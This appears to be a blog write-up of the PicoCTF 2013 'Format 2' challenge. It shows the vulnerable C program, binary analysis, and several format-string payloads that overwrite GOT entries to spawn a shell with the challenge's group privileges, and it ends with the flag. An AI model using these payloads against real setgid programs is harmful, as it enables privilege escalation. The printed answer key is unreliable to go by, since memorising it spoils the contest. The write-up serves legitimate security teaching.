hacktracking: # PicoCTF 2k13

# PicoCTF 2k13 - Format 2

$ cat format2.c
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void be_nice_to_people() {
    // /bin/sh is usually symlinked to bash, which usually drops privs. Make
    // sure we don't drop privs if we exec bash, (ie if we call system()).
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, const char **argv) {
    be_nice_to_people();
    char buf[80];
    snprintf(buf, 70, argv[1]);
    printf(buf);
    printf("\n");
    system("/bin/ls");
    exit(0);
}
$ objdump -R format2
format2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   printf
0804a004 R_386_JUMP_SLOT   getegid
0804a008 R_386_JUMP_SLOT   system
0804a00c R_386_JUMP_SLOT   __gmon_start__
0804a010 R_386_JUMP_SLOT   exit
0804a014 R_386_JUMP_SLOT   __libc_start_main
0804a018 R_386_JUMP_SLOT   snprintf
0804a01c R_386_JUMP_SLOT   putchar
0804a020 R_386_JUMP_SLOT   setresgid
$ gdb -q format2
(gdb) x/xw 0x0804a008
0x804a008 : 0x080483e6
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804852d <+0>: push   ebp
   0x0804852e <+1>: mov    ebp,esp
   0x08048530 <+3>: and    esp,0xfffffff0
   0x08048533 <+6>: add    esp,0xffffff80
   0x08048536 <+9>: mov    eax,DWORD PTR [ebp+0xc]
   0x08048539 <+12>: mov    DWORD PTR [esp+0x1c],eax
   0x0804853d <+16>: mov    eax,gs:0x14
   0x08048543 <+22>: mov    DWORD PTR [esp+0x7c],eax
   0x08048547 <+26>: xor    eax,eax
   0x08048549 <+28>: call   0x8048504 <be_nice_to_people>
   0x0804854e <+33>: mov    eax,DWORD PTR [esp+0x1c]
   0x08048552 <+37>: add    eax,0x4
   0x08048555 <+40>: mov    eax,DWORD PTR [eax]
   0x08048557 <+42>: mov    DWORD PTR [esp+0x8],eax
   0x0804855b <+46>: mov    DWORD PTR [esp+0x4],0x46
   0x08048563 <+54>: lea    eax,[esp+0x2c]
   0x08048567 <+58>: mov    DWORD PTR [esp],eax
   0x0804856a <+61>: call   0x8048420 <snprintf@plt>
   0x0804856f <+66>: lea    eax,[esp+0x2c]
   0x08048573 <+70>: mov    DWORD PTR [esp],eax
   0x08048576 <+73>: call   0x80483c0 <printf@plt>
   0x0804857b <+78>: mov    DWORD PTR [esp],0xa
   0x08048582 <+85>: call   0x8048430 <putchar@plt>
   0x08048587 <+90>: mov    DWORD PTR [esp],0x8048670
   0x0804858e <+97>: call   0x80483e0 <system@plt>
   0x08048593 <+102>: mov    DWORD PTR [esp],0x0
   0x0804859a <+109>: call   0x8048400 <exit@plt>
End of assembler dump.
$ # 0x804a000 <printf@got.plt>: 0x080483c6 --> 0x080483e6
$ ltrace ./format2 `python -c 'print "/bin/sh;" + "\x02\xd6\xff\xff" + "\x0f\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*9 + "%.31x" + "%hn" + "%hn" + "%134513534d" + "%n"'`
__libc_start_main(0x804852d, 2, -10508, 0x80485a0, 0x8048610 <unfinished ...>
getegid()                                                                                                           = 8013
setresgid(8013, 8013, 8013, 0xf7ffd918, 0)                                                                          = 0
snprintf("/bin/sh", 70, "/bin/sh;\002\326\377\377\017\326"..., 0xf7ff249c, 0xffffd694, 0, 0)                        = 134513638
printf("/bin/sh"sh-4.2$ id
uid=8013(user6748) gid=8013(user6748) groups=8013(user6748)
$ ./format2 `python -c 'print "/bin/sh;" + "\x02\xd6\xff\xff" + "\x0f\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*9 + "%.31x" + "%hn" + "%hn" + "%134513534d" + "%n"'`
Segmentation fault
$ # 0x804a000 <printf@got.plt>: 0x080483c6 --> 0x080483e6
$ ltrace ./format2 `python -c 'print "/bin/sh;" + "\x1b\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*10 + "%hn" + "%134513561d" + "%n"'`
__libc_start_main(0x804852d, 2, -10492, 0x80485a0, 0x8048610 <unfinished ...>
getegid()                                                                                                           = 8013
setresgid(8013, 8013, 8013, 0xf7ffd918, 0)                                                                          = 0
snprintf("/bin/sh;\033\326\377\377\220\220\220M", 70, "/bin/sh;\033\326\377\377\220\220"..., 0xf7ff249c, 0xffffd6a4, 0, 0, 0xffffd704, 0x80482cb) = 134513638
printf("/bin/sh;\033\326\377\377\220\220"...sh-4.2$ id
uid=8013(user6748) gid=8013(user6748) groups=8013(user6748)
$ ./format2 `python -c 'print "/bin/sh;" + "\x1b\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*10 + "%hn" + "%134513561d" + "%n"'`
Illegal instruction
$ # 0x804a01c <putchar@got.plt>: 0x08048436 --> 0x0804858e
$ export PATH=$PATH:$HOME
$ ln -s /bin/dash $HOME/$'\307\004\206\004\b\350M\376\377\377\307\004$'
$ ./format2 `python -c 'print "\x1c\xa0\x04\x08" + "%134514058d" + "%9$n"'`
$ id
uid=8013(user6748) gid=3006(format2) groups=8013(user6748)
$ cat key
now_youre_a_format_string_master
# PicoCTF 2k13 - Format 2

No comments:
